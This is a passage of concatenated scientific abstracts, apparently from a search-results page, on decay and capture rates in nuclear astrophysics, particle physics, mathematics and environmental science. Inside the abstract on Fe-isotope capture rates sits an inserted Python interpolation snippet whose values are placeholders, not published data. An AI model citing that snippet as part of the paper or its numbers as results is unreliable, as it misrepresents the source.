The average emission rates of UFP number concentrations measured by P-Trak and DiSCmini were 1.2 × 10(14) ± 6.5 × 10(13) particles/min and 3.3 × 10(14) ± 2.4 × 10(14) particles/min, respectively. The average emission rate of UFP surface area concentration was 3.1 × 10(11) ± 2.0 × 10(11) μm(2)/min. UFP emission rate was associated with resurfacer age. DiSCmini measured higher decay and emission rates than P-Trak due to their different measuring mechanisms and size ranges. 19. Neutron Capture Rates near A=130 which Effect a Global Change to the r-Process Abundance Distribution SciTech Connect Surman, Rebecca; Beun, Joshua; Mclaughlin, Gail C; Hix, William Raphael 2009-01-01 We investigate the impact of neutron capture rates near the A=130 peak on the r-process abundance pattern. We show that these capture rates can alter the abundances of individual nuclear species, not only in the region of A=130 peak but also throughout the abundance pattern. We discuss in general the nonequilibrium processes that produce these abundance changes and determine which capture rates have the most significant impact. 20. A comprehensive study of Interatomic Coulombic Decay in argon dimers: Extracting R-dependent absolute decay rates from the experiment SciTech Connect Rist, J.; Miteva, T.; Gaire, B.; Sann, H.; Trinter, F.; Keiling, M.; Gehrken, N.; Moradmand, A.; Berry, B.; Zohrabi, M.; Kunitski, M.; Ben-Itzhak, I.; Belkacem, A.; Weber, T.; Landers, A. L.; Schöffler, M.; Williams, J. B.; Kolorenč, P.; Gokhberg, K.; Jahnke, T.; Dörner, R. 2016-09-15 In this paper we present a comprehensive and detailed study of Interatomic Coulombic Decay (ICD) occurring after irradiating argon dimers with XUV-synchrotron radiation. A manifold of different decay channels is observed and the corresponding initial and final states are assigned. Additionally, the effect of nuclear dynamics on the ICD electron spectrum is examined for one specific decay channel. The internuclear distance-dependent width Γ(R) of the decay is obtained from the measured kinetic energy release distribution of the ions employing a classical nuclear dynamics model. 1. Determination of the neutron-capture rate of 17C for r -process nucleosynthesis Heine, M.; Typel, S.; Wu, M.-R.; Adachi, T.; Aksyutina, Y.; Alcantara, J.; Altstadt, S.; Alvarez-Pol, H.; Ashwood, N.; Atar, L.; Aumann, T.; Avdeichikov, V.; Barr, M.; Beceiro-Novo, S.; Bemmerer, D.; Benlliure, J.; Bertulani, C. A.; Boretzky, K.; Borge, M. J. G.; Burgunder, G.; Caamano, M.; Caesar, C.; Casarejos, E.; Catford, W.; Cederkäll, J.; Chakraborty, S.; Chartier, M.; Chulkov, L. V.; Cortina-Gil, D.; Crespo, R.; Datta Pramanik, U.; Diaz Fernandez, P.; Dillmann, I.; Elekes, Z.; Enders, J.; Ershova, O.; Estrade, A.; Farinon, F.; Fraile, L. M.; Freer, M.; Freudenberger, M.; Fynbo, H. O. U.; Galaviz, D.; Geissel, H.; Gernhäuser, R.; Göbel, K.; Golubev, P.; Gonzalez Diaz, D.; Hagdahl, J.; Heftrich, T.; Heil, M.; Heinz, A.; Henriques, A.; Holl, M.; Ickert, G.; Ignatov, A.; Jakobsson, B.; Johansson, H. T.; Jonson, B.; Kalantar-Nayestanaki, N.; Kanungo, R.; Kelic-Heil, A.; Knöbel, R.; Kröll, T.; Krücken, R.; Kurcewicz, J.; Kurz, N.; Labiche, M.; Langer, C.; Le Bleis, T.; Lemmon, R.; Lepyoshkina, O.; Lindberg, S.; Machado, J.; Marganiec, J.; Martínez-Pinedo, G.; Maroussov, V.; Mostazo, M.; Movsesyan, A.; Najafi, A.; Neff, T.; Nilsson, T.; Nociforo, C.; Panin, V.; Paschalis, S.; Perea, A.; Petri, M.; Pietri, S.; Plag, R.; Prochazka, A.; Rahaman, A.; Rastrepina, G.; Reifarth, R.; Ribeiro, G.; Ricciardi, M. 
V.; Rigollet, C.; Riisager, K.; Röder, M.; Rossi, D.; Sanchez del Rio, J.; Savran, D.; Scheit, H.; Simon, H.; Sorlin, O.; Stoica, V.; Streicher, B.; Taylor, J. T.; Tengblad, O.; Terashima, S.; Thies, R.; Togano, Y.; Uberseder, E.; Van de Walle, J.; Velho, P.; Volkov, V.; Wagner, A.; Wamers, F.; Weick, H.; Weigand, M.; Wheldon, C.; Wilson, G.; Wimmer, C.; Winfield, J. S.; Woods, P.; Yakorev, D.; Zhukov, M. V.; Zilges, A.; Zuber, K.; R3B Collaboration 2017-01-01 With the R 3B -LAND setup at GSI we have measured exclusive relative-energy spectra of the Coulomb dissociation of 18C at a projectile energy around 425 A MeV on a lead target, which are needed to determine the radiative neutron-capture cross sections of 17C into the ground state of 18C. Those data have been used to constrain theoretical calculations for transitions populating excited states in 18C. This allowed to derive the astrophysical cross section σnγ * accounting for the thermal population of 17C target states in astrophysical scenarios. The experimentally verified capture rate is significantly lower than those of previously obtained Hauser-Feshbach estimations at temperatures T9≤ 1 GK. Network simulations with updated neutron-capture rates and hydrodynamics according to the neutrino-driven wind model as well as the neutron-star merger scenario reveal no pronounced influence of neutron capture of 17C on the production of second- and third-peak elements in contrast to earlier sensitivity studies. 2. Well hydraulics in pumping tests with exponentially decayed rates of abstraction in confined aquifers Wen, Zhang; Zhan, Hongbin; Wang, Quanrong; Liang, Xing; Ma, Teng; Chen, Chen 2017-05-01 Actual field pumping tests often involve variable pumping rates which cannot be handled by the classical constant-rate or constant-head test models, and often require a convolution process to interpret the test data. In this study, we proposed a semi-analytical model considering an exponentially decreasing pumping rate started at a certain (higher) rate and eventually stabilized at a certain (lower) rate for cases with or without wellbore storage. A striking new feature of the pumping test with an exponentially decayed rate is that the drawdowns will decrease over a certain period of time during intermediate pumping stage, which has never been seen before in constant-rate or constant-head pumping tests. It was found that the drawdown-time curve associated with an exponentially decayed pumping rate function was bounded by two asymptotic curves of the constant-rate tests with rates equaling to the starting and stabilizing rates, respectively. The wellbore storage must be considered for a pumping test without an observation well (single-well test). Based on such characteristics of the time-drawdown curve, we developed a new method to estimate the aquifer parameters by using the genetic algorithm. 3. Rate-based process modeling study of CO{sub 2} capture with aqueous monoethanolamine solution SciTech Connect Zhang, Y.; Chen, H.; Chen, C.C.; Plaza, J.M.; Dugas, R.; Rochelle, G.T. 2009-10-15 Rate-based process modeling technology has matured and is increasingly gaining acceptance over traditional equilibrium-stage modeling approaches. Recently comprehensive pilot plant data for carbon dioxide (CO{sub 2}) capture with aqueous monoethanolamine (MEA) solution have become available from the University of Texas at Austin. 
The pilot plant data cover key process variables including the CO2 concentration in the gas stream, the CO2 loading in the lean MEA solution, the liquid-to-gas ratio, and the packing type. In this study, we model the pilot plant operation with Aspen RateSep, a second-generation rate-based multistage separation unit operation model in Aspen Plus. After a brief review of rate-based modeling, thermodynamic and kinetic models for CO2 absorption with the MEA solution, and transport property models, we show an excellent match of the rate-based model predictions against the comprehensive pilot plant data and we validate the superiority of the rate-based models over the traditional equilibrium-stage models. We further examine the impacts of key rate-based modeling options, i.e., film discretization options and flow model options. The rate-based model provides excellent predictive capability, and it should be very useful for design and scale-up of CO2 capture processes. 4. Electron-capture Rates for pf-shell Nuclei in Stellar Environments and Nucleosynthesis Suzuki, Toshio; Honma, Michio; Mori, Kanji; Famiano, Michael A.; Kajino, Toshitaka; Hidakai, Jun; Otsuka, Takaharu Gamow-Teller strengths in pf-shell nuclei obtained with a new shell-model Hamiltonian, GXPF1J, are used to evaluate electron-capture rates on pf-shell nuclei in stellar environments. The nuclear weak rates with GXPF1J, which are generally smaller than previous evaluations for proton-rich nuclei, are applied to nucleosynthesis in type Ia supernova explosions. The updated rates are found to lead to less production of neutron-rich nuclei such as 58Ni and 54Cr, thus pointing toward a solution of the problem of over-production of neutron-rich isotopes of iron-group nuclei compared to the solar abundance. 5. Fine-grid calculations for stellar electron and positron capture rates on Fe isotopes SciTech Connect Nabi, Jameel-Un; Tawfik, Abdel Nasser 2013-03-15 The acquisition of precise and reliable nuclear data is a prerequisite to success for stellar evolution and nucleosynthesis studies. Core-collapse simulators find it challenging to generate an explosion from the collapse of the core of massive stars. It is believed that a better understanding of the microphysics of core collapse can lead to successful results. The weak interaction processes are able to trigger the collapse and control the lepton-to-baryon ratio (Ye) of the core material. It is suggested that the temporal variation of Ye within the core of a massive star has a pivotal role to play in the stellar evolution, and that fine-tuning of this parameter at various stages of presupernova evolution is the key to generating an explosion. During the presupernova evolution of massive stars, isotopes of iron, mainly 54-56Fe, are considered to be key players in controlling the Ye ratio via electron capture on these nuclides. Recently an improved microscopic calculation of weak-interaction-mediated rates for iron isotopes was introduced using the proton-neutron quasiparticle random-phase-approximation (pn-QRPA) theory. The pn-QRPA theory allows a microscopic state-by-state calculation of stellar capture rates, which greatly increases the reliability of the calculated rates. The results were suggestive of some fine-tuning of the Ye ratio during various phases of stellar evolution. Here we present for the first time the fine-grid calculation of the electron and positron capture rates on 54-56Fe.
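Fine-grid rate tables of the kind just described are normally supplied to core-collapse codes as log-spaced grids in temperature and density and interpolated at run time. The following sketch shows one common approach, bilinear interpolation of log10(rate) in log10(T) and log10(ρYe); the grid values in it are illustrative placeholders, not numbers from the paper, and the function names are ours.

```python
import math

# Hypothetical electron-capture rate table (placeholder values, NOT from the paper):
# rows indexed by log10(T [K]), columns by log10(rho*Ye [g/cm^3]),
# entries are log10(rate [1/s]).  Real fine-grid tables are much denser,
# but the interpolation logic is the same.
logT_grid   = [9.0, 9.5, 10.0]
logRho_grid = [7.0, 8.0, 9.0]
logRate = [
    [-4.0, -2.5, -1.0],   # logT = 9.0
    [-3.0, -1.8, -0.5],   # logT = 9.5
    [-2.2, -1.0,  0.3],   # logT = 10.0
]

def interp_rate(logT, logRho):
    """Bilinear interpolation of log10(rate) on the (logT, logRho) grid."""
    # locate the bracketing grid cell (clamping to the table edges)
    i = min(max(sum(t <= logT for t in logT_grid) - 1, 0), len(logT_grid) - 2)
    j = min(max(sum(r <= logRho for r in logRho_grid) - 1, 0), len(logRho_grid) - 2)
    tfrac = (logT - logT_grid[i]) / (logT_grid[i + 1] - logT_grid[i])
    rfrac = (logRho - logRho_grid[j]) / (logRho_grid[j + 1] - logRho_grid[j])
    # interpolate along rho at the two bracketing temperatures, then along T
    lo = logRate[i][j]     + rfrac * (logRate[i][j + 1]     - logRate[i][j])
    hi = logRate[i + 1][j] + rfrac * (logRate[i + 1][j + 1] - logRate[i + 1][j])
    return lo + tfrac * (hi - lo)

# example: rate at logT = 9.7, log10(rho*Ye) = 8.4
print(10 ** interp_rate(9.7, 8.4), "captures per second (illustrative only)")
```

Interpolating in log space keeps the scheme stable even though the rates themselves vary by many orders of magnitude across the grid.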
The sensitivity of the pn-QRPA calculated capture rates to the deformation parameter is also studied in this work. Core-collapse simulators may find this calculation suitable for interpolation purposes and for necessary incorporation in the stellar evolution codes. 6. Core hole screening and decay rates of double core ionized first row hydrides. PubMed Inhester, L; Groenhof, G; Grubmüller, H 2013-04-28 Because of the high intensity, X-ray free electron lasers allow one to create and probe double core ionized states in molecules. The decay of these multiple core ionized states crucially determines the evolution of radiation damage in single molecule diffractive imaging experiments. Here we have studied the Auger decay in hydrides of first row elements after single and double core ionization by quantum mechanical ab initio calculations. In our approach the continuum wave function of the emitted Auger electron is expanded into spherical harmonics on a radial grid. The obtained decay rates of double K-shell vacancies were found to be systematically larger than those for the respective single K-shell vacancies, markedly exceeding the expected factor of two. This enhancement is attributed to the screening effects induced by the core hole. We propose a simple model, which is able to predict core hole decay rates in molecules with low Z elements based on the electron density in the vicinity of the core hole. 7. Polynomial decay rate of a thermoelastic Mindlin-Timoshenko plate model with Dirichlet boundary conditions Grobbelaar-Van Dalsen, Marié 2015-02-01 In this article, we are concerned with the polynomial stabilization of a two-dimensional thermoelastic Mindlin-Timoshenko plate model with no mechanical damping. The model is subject to Dirichlet boundary conditions on the elastic as well as the thermal variables. The work complements our earlier work in Grobbelaar-Van Dalsen (Z Angew Math Phys 64:1305-1325, 2013) on the polynomial stabilization of a Mindlin-Timoshenko model in a radially symmetric domain under Dirichlet boundary conditions on the displacement and thermal variables and free boundary conditions on the shear angle variables. In particular, our aim is to investigate the effect of the Dirichlet boundary conditions on all the variables on the polynomial decay rate of the model. By once more applying a frequency domain method in which we make critical use of an inequality for the trace of Sobolev functions on the boundary of a bounded, open connected set we show that the decay is slower than in the model considered in the cited work. A comparison of our result with our polynomial decay result for a magnetoelastic Mindlin-Timoshenko model subject to Dirichlet boundary conditions on the elastic variables in Grobbelaar-Van Dalsen (Z Angew Math Phys 63:1047-1065, 2012) also indicates a correlation between the robustness of the coupling between parabolic and hyperbolic dynamics and the polynomial decay rate in the two models. 8. A study of the fully differential inclusive semileptonic B meson decay rate Lipeles, Elliot 2004-12-01 We present a study of the fully differential inclusive semileptonic B meson decay rate. Using a maximum likelihood fit, we extract the fractional contributions from the B → X clnu processes with Xc = D, D*, D**, and nonresonant Xc, and the process B → Xulnu. From the fit results, we extract moments of B → Xclnu differential decay rate and the partial branching fraction of the B → Xulnu decay in a restricted region of phase space. 
The region in which the B → Xulnu partial branching fraction is measured is MX < 1.5 GeV/c2, q2 > 11 GeV2/c4. This measurement is used to extract CKM parameter |Vub| = (4.73 +/- 0.23 +/- 0.82 +/- 0.18 +/- 0.56 +/- 0.66) x 10-3, where the uncertainties are due to statistics, detector systematics, B → Xcl nu model dependence, B → Xulnu model dependence, and theoretical uncertainties. From the < M2X-M2D > moment, the first moment of the photon energy spectrum in B → Xsgamma, and the semileptonic B branching fraction, we extract the CKM parameter |V cb| = (4.12 +/- .10 +/- 0.09 +/- 0.16) x 10-2, where the uncertainties are due to the measurement of the semileptonic B decay rate, the moments measurements, and theoretical uncertainties. Both CKM parameter extractions use Heavy Quark Effective Theory (HQET) predictions for inclusive semileptonic B decay. The measured moments are also used to test related predictions. 9. A capture-rate model of net-spinning caddisfly communities. PubMed 1987-03-01 Empirical research suggests that net-spinning caddisflies require two basic resources, suspended particulate foods, and the currents which deliver them. I present a theoretical model of caddisfly communities based on quantitative differences in the capture rate produced by different catchnet designs. It assumes that catchnet architecture reflects a tradeoff between water filtration rate (flux through the net) and capture efficiency (the proportion of suspended items retained), and that the marginal resource concentration required by species with different catchnet morphologies should reflect the product of these parameters. The model hypothesizes a) that downstream changes in the physical morphology of the stream channel cause a shift in the relative importance of population limitations imposed by food and current-substrate availability, b) that the interaction of these physical changes with the filtering biota results in a seston resource gradient, and c) that the distribution of each taxon along this resource gradient reflects a marginal resource requirement determined by the functional morphology of its catchnet. 10. Informing Neutron-Capture Rates through (d,p) Reactions on Neutron-Rich Tin Isotopes Manning, B.; Cizewski, J. A.; Kozub, R. L.; Ahn, S.; Allmond, J. M.; Bardayan, D. W.; Chae, K. Y.; Chipps, K. A.; Howard, M. E.; Jones, K. L.; Liang, J. F.; Matos, M.; Nunes, F. M.; Nesaraja, C. D.; O'Malley, P. D.; Pain, S. D.; Peters, W. A.; Pittman, S. T.; Ratkiewicz, A.; Schmitt, K. T.; Shapira, D.; Smith, M. S.; Titus, L. 2014-03-01 Level energies and spectroscopic information for neutron-rich nuclei provide important input for r-process nucleosynthesis calculations; specifically, the location and strength of single-neutron l = 1 states when calculating neutron-capture rates. Surman and collaborators have performed sensitivity studies to show that varying neutron-capture rates can significantly alter final r-process abundances. However, there are many nuclei important to the r-process that cannot be studied. Extending studies to more neutron-rich nuclei will help constrain the nuclear shell-model in extrapolating to nuclei even further from stability. The (d,p) reaction has been measured with radioactive ion beams of 126Sn and 128Sn to complete the set of (d,p) studies on even mass tin isotopes from doubly-magic 132 to stable 124Sn. Work supported in part by the U.S. Department of Energy and National Science Foundation. 11. Rates for neutron-capture reactions on tungsten isotopes in iron meteorites. 
[Abstract only NASA Technical Reports Server (NTRS) Masarik, J.; Reedy, R. C. 1994-01-01 High-precision W isotopic analyses by Harper and Jacobsen indicate the W-182/W-183 ratio in the Toluca iron meteorite is shifted by -(3.0 +/- 0.9) x 10(exp -4) relative to a terrestrial standard. Possible causes of this shift are neutron-capture reactions on W during Toluca's approximately 600-Ma exposure to cosmic ray particles or radiogenic growth of W-182 from 9-Ma Hf-182 in the silicate portion of the Earth after removal of W to the Earth's core. Calculations for the rates of neutron-capture reactions on W isotopes were done to study the first possibility. The LAHET Code System (LCS) which consists of the Los Alamos High Energy Transport (LAHET) code and the Monte Carlo N-Particle(MCNP) transport code was used to numerically simulate the irradiation of the Toluca iron meteorite by galactic-cosmic-ray (GCR) particles and to calculate the rates of W(n, gamma) reactions. Toluca was modeled as a 3.9-m-radius sphere with the composition of a typical IA iron meteorite. The incident GCR protons and their interactions were modeled with LAHET, which also handled the interactions of neutrons with energies above 20 MeV. The rates for the capture of neutrons by W-182, W-183, and W-186 were calculated using the detailed library of (n, gamma) cross sections in MCNP. For this study of the possible effect of W(n, gamma) reactions on W isotope systematics, we consider the peak rates. The calculated maximum change in the normalized W-182/W-183 ratio due to neutron-capture reactions cannot account for more than 25% of the mass 182 deficit observed in Toluca W. 12. β+ Gamow-Teller transition strengths from 46Ti and stellar electron-capture rates. PubMed Noji, S; Zegers, R G T; Austin, Sam M; Baugher, T; Bazin, D; Brown, B A; Campbell, C M; Cole, A L; Doster, H J; Gade, A; Guess, C J; Gupta, S; Hitt, G W; Langer, C; Lipschutz, S; Lunderberg, E; Meharchand, R; Meisel, Z; Perdikakis, G; Pereira, J; Recchia, F; Schatz, H; Scott, M; Stroberg, S R; Sullivan, C; Valdez, L; Walz, C; Weisshaar, D; Williams, S J; Wimmer, K 2014-06-27 The Gamow-Teller strength in the β(+) direction to (46)Sc was extracted via the (46)Ti(t,(3)He + γ) reaction at 115  MeV/u. The γ-ray coincidences served to precisely measure the very weak Gamow-Teller transition to a final state at 991 keV. Although this transition is weak, it is crucial for accurately estimating electron-capture rates in astrophysical scenarios with relatively low stellar densities and temperatures, such as presupernova stellar evolution. Shell-model calculations with different effective interactions in the pf shell-model space do not reproduce the experimental Gamow-Teller strengths, which is likely due to sd-shell admixtures. Calculations in the quasiparticle random phase approximation that are often used in astrophysical simulations also fail to reproduce the experimental Gamow-Teller strength distribution, leading to strongly overestimated electron-capture rates. Because reliable theoretical predictions of Gamow-Teller strengths are important for providing astrophysical electron-capture reaction rates for a broad set of nuclei in the lower pf shell, we conclude that further theoretical improvements are required to match astrophysical needs. 13. β+ Gamow-Teller Transition Strengths from Ti46 and Stellar Electron-Capture Rates Noji, S.; Zegers, R. G. T.; Austin, Sam M.; Baugher, T.; Bazin, D.; Brown, B. A.; Campbell, C. M.; Cole, A. L.; Doster, H. J.; Gade, A.; Guess, C. 
J.; Gupta, S.; Hitt, G. W.; Langer, C.; Lipschutz, S.; Lunderberg, E.; Meharchand, R.; Meisel, Z.; Perdikakis, G.; Pereira, J.; Recchia, F.; Schatz, H.; Scott, M.; Stroberg, S. R.; Sullivan, C.; Valdez, L.; Walz, C.; Weisshaar, D.; Williams, S. J.; Wimmer, K. 2014-06-01 The Gamow-Teller strength in the β+ direction to Sc46 was extracted via the Ti46(t ,He3+γ) reaction at 115 MeV /u. The γ-ray coincidences served to precisely measure the very weak Gamow-Teller transition to a final state at 991 keV. Although this transition is weak, it is crucial for accurately estimating electron-capture rates in astrophysical scenarios with relatively low stellar densities and temperatures, such as presupernova stellar evolution. Shell-model calculations with different effective interactions in the pf shell-model space do not reproduce the experimental Gamow-Teller strengths, which is likely due to sd-shell admixtures. Calculations in the quasiparticle random phase approximation that are often used in astrophysical simulations also fail to reproduce the experimental Gamow-Teller strength distribution, leading to strongly overestimated electron-capture rates. Because reliable theoretical predictions of Gamow-Teller strengths are important for providing astrophysical electron-capture reaction rates for a broad set of nuclei in the lower pf shell, we conclude that further theoretical improvements are required to match astrophysical needs. 14. A predator equalizes rate of capture of a schooling prey in a patchy environment. PubMed Vijayan, Sundararaj; Kotler, Burt P; Abramsky, Zvika 2017-05-01 Prey individuals are often distributed heterogeneously in the environment, and their abundances and relative availabilities vary among patches. A foraging predator should maximize energetic gains by selectively choosing patches with higher prey density. However, catching behaviorally responsive and group-forming prey in patchy environments can be a challenge for predators. First, they have to identify the profitable patches, and second, they must manage the prey's sophisticated anti-predator behavior. Thus, the forager and its prey have to continuously adjust their behavior to that of their opponent. Given these conditions, the foraging predator's behavior should be dynamic with time in terms of foraging effort and prey capture rates across different patches. Theoretically, the allocation of its time among patches of behaviorally responsive prey should be such that it equalizes its prey capture rates across patches through time. We tested this prediction in a model system containing a predator (little egret) and group-forming prey (common gold fish) in two sets of experiments in which (1) patches (pools) contained equal numbers of prey, or in which (2) patches contained unequal densities of prey. The egret equalized the prey capture rate through time in both equal and different density experiments. Copyright © 2017 Elsevier B.V. All rights reserved. 15. A Measurement of the Rate of Muon Capture in Hydrogen Gas andDetermination of the Proton's Induced Pseudoscalar Coupling gP SciTech Connect Banks, Thomas Ira 2007-07-01 This dissertation describes a measurement of the rate ofnuclear muon capture by the proton, performed by the MuCap Collaborationusing a new technique based on a time projection chamber operating inultraclean, deuterium-depleted hydrogen gas at room temperature and 1 MPapressure. 
The hydrogen target's low gas density of 1 percent compared to liquid hydrogen is key to avoiding uncertainties that arise from the formation of muonic molecules. The capture rate was obtained from the difference between the μ- disappearance rate in hydrogen--as determined from data collected in the experiment's first physics run in fall 2004--and the world average for the μ+ decay rate. After combining the results of my analysis with the results from another independent analysis of the 2004 data, the muon capture rate from the hyperfine singlet ground state of the mu-p atom is found to be ΛS = 725.0 ± 17.4 s^-1, from which the induced pseudoscalar coupling of the nucleon, gP(q^2 = -0.88 m_μ^2) = 7.3 ± 1.1, is extracted. This result for gP is consistent with theoretical predictions that are based on the approximate chiral symmetry of QCD. 16. Analytic heating rate of neutron star merger ejecta derived from Fermi's theory of beta decay Hotokezaka, Kenta; Sari, Re'em; Piran, Tsvi 2017-06-01 Macronovae (kilonovae) that arise in binary neutron star mergers are powered by radioactive beta decay of hundreds of r-process nuclides. We derive, using Fermi's theory of beta decay, an analytic estimate of the nuclear heating rate. We show that the heating rate evolves as a power law ranging between t^{-6/5} and t^{-4/3}. The overall magnitude of the heating rate is determined by the mean values of nuclear quantities, e.g. the nuclear matrix elements of beta decay. These values are specified by using nuclear experimental data. We discuss the role of higher-order beta transitions and the robustness of the power law. The robust and simple form of the heating rate suggests that observations of a late-time bolometric light curve ∝ t^{-4/3} would be direct evidence of an r-process-driven macronova. Such observations could also enable us to estimate the total amount of r-process nuclei produced in the merger. 17. Short term memory bowing effect is consistent with presentation rate dependent decay PubMed Central 2010-01-01 I reanalyze the free recall data of Murdock, J Exp Psychol 64(5):482–488 (1962) and Murdock and Okada, J Verbal Learn and Verbal Behav 86:263–267 (1970), which show the famous bowing effect in which initial and recent items are recalled better than intermediate items (primacy and recency effects). Recent item recall probabilities follow a logarithmic decay with time of recall, consistent with the tagging/retagging theory. The slope of the decay increases with increasing presentation rate. The initial items, with an effectively low presentation rate, decay with the slowest logarithmic slope, explaining the primacy effect. The finding that presentation rate limits the duration of short term memory suggests a basis for memory loss in busy adults, for the importance of slow music practice, and for long term memory deficiencies in people with attention deficits who may be artificially increasing the presentation rates of their surroundings. A well-defined, quantitative measure of the primacy effect is introduced. PMID:22132046 18. Rates and C P asymmetries of charmless two-body baryonic Bu,d,s decays Chua, Chun-Khiang 2017-05-01 With the experimental evidence of B¯ 0→p p ¯ and B-→Λ p ¯ decays, it is now possible to extract both tree and penguin amplitudes of the charmless two-body baryonic B decays for the first time. The extracted penguin-tree ratio agrees with the expectation.
Using the topological amplitude approach with the experimental results on B¯ 0→p p ¯ and B-→Λ p ¯ decay rates as input, predictions on all other B¯ q→B B ¯ , B D ¯ , D B ¯ and D D ¯ decay rates, where B and D are the low lying octet and decuplet baryons, respectively, are given. It is nontrivial that the results do not violate any existing experimental upper limit. From the analysis it is understandable that why B¯ 0→p p ¯ and B-→Λ p ¯ modes are the first two modes with experimental evidences. Relations on rates are verified using the numerical results. We note that the predicted B-→p Δ++ ¯ rate is close to the experimental bound, which has not been updated in the last ten years. Direct C P asymmetries of all B¯q→B B ¯, B D ¯, D B ¯ and D D ¯ modes are explored. Relations on C P asymmetries are examined using the numerical results. The direct C P asymmetry of B¯ 0→p p ¯ decay can be as large as ±50 %. Some of the C P asymmetries can serve as tests of the Standard Model. Most of them are pure penguin modes, which are expected to be sensitive to new physics contributions. In particular, B¯s 0→Ξ-Ξ- ¯ , B¯ 0→Ξ-Σ*- ¯ , B¯ 0→Ω-Ξ- ¯ , B¯s 0→Σ*-Σ*- ¯ , B¯s 0→Ω-Ω- ¯ , B¯s 0→Ξ-Ξ*- ¯ , B¯s 0→Ξ*-Ξ- ¯ , B¯ 0→Ξ*-Σ*- ¯ , B¯ 0→Ω-Ξ*- ¯ and B¯s 0→Ξ*-Ξ*- ¯ decays are Δ S =-1 pure penguin modes with unsuppressed rates, which can be searched in the near future. Their C P asymmetries are constrained to be of few % and are good candidates to be added to the list of the tests of the Standard Model. 19. Bayesian meta-analysis to synthesize decay rate constant estimates for common fecal indicator bacteria. PubMed Brooks, Lauren E; Field, Katharine G 2016-11-01 20. Optimal decay rates of classical solutions for the full compressible MHD equations Gao, Jincheng; Tao, Qiang; Yao, Zheng-an 2016-04-01 In this paper, we are concerned with optimal decay rates for higher-order spatial derivatives of classical solutions to the full compressible MHD equations in three-dimensional whole space. If the initial perturbation is small in {H^3}-norm and bounded in {L^q(qin [1, 6/5 ))}-norm, we apply the Fourier splitting method by Schonbek (Arch Ration Mech Anal 88:209-222, 1985) to establish optimal decay rates for the second-order spatial derivatives of solutions and the third-order spatial derivatives of magnetic field in {L^2}-norm. These results improve the work of Pu and Guo (Z Angew Math Phys 64:519-538, 2013). 1. Relativistic two-photon decay rates of 2s12 hydrogenic ions Goldman, S. P.; Drake, G. W. F. 1981-07-01 Rates are calculated for the decay of metastable 2s12 ions to the ground state by the simultaneous emission of two photons. The calculation includes all relativistic and retardation effects, and all combinations of photon multipoles which make significant contributions up to Z=100. Summations over intermediate states are performed by constructing a finite-basis-set representation of the Dirac Green's function. The estimated accuracy of the results is +/- 10 ppm for all Z up to 100. The decay rates are about 20 (αZ)2% larger than an earlier calculation by Johnson owing to the inclusion of higher-order retardation effects. The general question of gauge invariance in two-photon transitions is discussed. 2. Casimir-Polder shift and decay rate in the presence of nonreciprocal media Fuchs, Sebastian; Crosse, J. A.; Buhmann, Stefan Yoshi 2017-02-01 We calculate the Casimir-Polder frequency shift and decay rate for an atom in front of a nonreciprocal medium by using macroscopic quantum electrodynamics. 
The results are a generalization of the respective quantities for matter with broken time-reversal symmetry which does not fulfill the Lorentz reciprocity principle. As examples, we contrast the decay rates, the resonant and nonresonant frequency shifts of a perfectly conducting (reciprocal) mirror with those of a perfectly reflecting nonreciprocal mirror. We find different power laws for the distance dependence of all quantities in the retarded and nonretarded limits. As an example of a more realistic nonreciprocal medium, we investigate a topological insulator subject to a time-symmetry-breaking perturbation. 3. The electron temperature and 44Ti decay rate in Cassiopeia A Laming, J. Martin 2001-11-01 The effects of plasma elemental composition and ionization state on the effective decay rate of 44Ti are investigated. We essentially follow the methods of the first authors to treat this topic, Mochizuki et al., but use more realistic plasma models, including radiative cooling, to compute the evolution of the charge state distribution behind the reverse shock. For uniform density ejecta (i.e., no clumps or bubbles) we find a negligible change to the decay rate of 44Ti. We discuss the effects of non-uniform ejecta. We also briefly consider the effects on these calculations of collisionless electron heating associated with weak secondary shocks propagating throughout the Cas A shell as a result of foward or reverse shock encounters with density inhomogeneities, recently suggested as an explanation for the hard X-ray tail seen in BeppoSAX and RXTE/OSSE spectra. . 4. Proton-capture Nucleosynthesis In Low Mass Stars: Effects of New Reaction Rates SciTech Connect Palmerini, S.; Busso, M.; La Cognata, M.; Cristallo, S. 2011-10-28 We present computations of nucleosynthesis in low-mass asymptotic-giant-branch stars of solar metallicity experiencing deep mixing. In this framework, we discuss the effects of recent improvements in relevant reaction rates for proton captures on intermediate-mass nuclei. The calculations are then performed on the basis of a parameterized circulation, where the effects of the new nuclear inputs are best compared to previous works. We find that especially the new reaction rate for the {sup 14}N(p,{gamma}){sup 15}O reaction implies considerable modifications in the composition of low mass red giant stars. 5. Concentrations and decay rates of ozone in indoor air in dependence on building and surface materials. PubMed Moriske, H J; Ebert, G; Konieczny, L; Menk, G; Schöndube, M 1998-08-01 The decay of ozone in indoor air was measured in a closed chamber after contact with different building materials and residential surfaces. The tested materials were: vinyl wall paper, woodchip paper, plywood, latex paint, fitted carpet, and plaster. In the summer of 1996, the entry of ozone from ambient air into indoor air during ventilation and the ozone decay in indoor air, after windows had been closed again, were studied. Measurements were done in a residential house on the outskirts of Berlin. The following results were gained: the chamber measurements showed a decay of ozone after contact with most of the materials put inside the chamber. Higher decay rates have been obtained for wall papers, plywood, fitted carpet and plaster. As described in the literature, ozone is able to react with olefines inside the materials and is able to form formaldehyde and other components. This formation of formaldehyde could also be confirmed in our investigations. 
Thus, in most cases, the formaldehyde concentrations were lower than the German guideline value of 0.1 ppm. The formation of formaldehyde could be prevented when a special wall paper that was coated with activated carbon was used. In the house, a complete ozone diffusion into indoor air took place during ventilation within 30 min. After closing the windows, the ozone concentrations decreased to the basic level before ventilation within 60-90 min. 6. Absorption cross-section and decay rate of rotating linear dilaton black holes Sakalli, I.; Aslan, O. A. 2016-02-01 We analytically study the scalar perturbation of non-asymptotically flat (NAF) rotating linear dilaton black holes (RLDBHs) in 4-dimensions. We show that both radial and angular wave equations can be solved in terms of the hypergeometric functions. The exact greybody factor (GF), the absorption cross-section (ACS), and the decay rate (DR) for the massless scalar waves are computed for these black holes (BHs). The results obtained for ACS and DR are discussed through graphs. 7. Optimal decay rate for the wave equation on a square with constant damping on a strip Stahn, Reinhard 2017-04-01 We consider the damped wave equation with Dirichlet boundary conditions on the unit square parametrized by Cartesian coordinates x and y. We assume the damping a to be strictly positive and constant for x<σ and zero for x>σ . We prove the exact t^{-4/3}-decay rate for the energy of classical solutions. Our main result (Theorem 1) answers question (1) of Anantharaman and Léautaud (Anal PDE 7(1):159-214, 2014, Section 2C). 8. Initial cooperative decay rate and cooperative Lamb shift of resonant atoms in an infinite cylindrical geometry SciTech Connect Friedberg, Richard; Manassah, Jamal T. 2011-08-15 We obtain in both the scalar 